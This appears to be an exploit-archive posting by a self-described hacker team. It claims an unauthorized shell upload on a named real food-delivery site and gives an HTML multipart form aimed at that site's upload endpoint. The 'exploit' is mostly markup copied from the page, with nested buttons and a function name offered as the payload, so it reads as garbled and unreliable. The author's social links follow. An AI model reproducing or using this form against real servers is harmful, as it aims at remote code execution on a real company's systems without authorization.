YemekSepeti Unauthorized Shell Upload Exploit

2020.03.07

Gaddar (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Vulnerability Title : YemekSepeti Unauthorized Shell Upload Exploit - Discovered By Gaddar
Author : Gaddar
Team : SiyahBayrak
Payload : Step_VM.uploadFileFor(attachment)
Exploit;
<form method="POST" action="https://portakal.yemeksepeti.com/attachment/file-up.php" enctype="multipart/form-data" >
<div ng-if="attachment.FileInformationList.length == 0" ng-init="fileInfo=attachment.FileInformationList[0]">
<p class="text-center">
<button class="btn-material btn-sm btn-upload mt-29" id="uploadButton_2" ng-click="Step_VM.uploadFileFor(attachment)">
<button class="btn-material btn-sm btn-upload" id="uploadButton_0" ng-click="Step_VM.uploadFileFor(attachment)">
Select File
</button>
<i class="fa fa-cloud-upload"></i> Submit
</button>
</p>
</div>
ScreenShot;
https://ibb.co/3B5ZRBR
My social accounts ;
Instagram.com/pt.php
Facebook.com/ptsec
Twitter.com/ptguvenlik
Youtube.com/c/gaddarsec
My Teammates : DeadLy-Warrior - StabilBey - Diablo

See this note in RAW Version

Vote for this issue:

44%

56%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

YemekSepeti Unauthorized Shell Upload Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.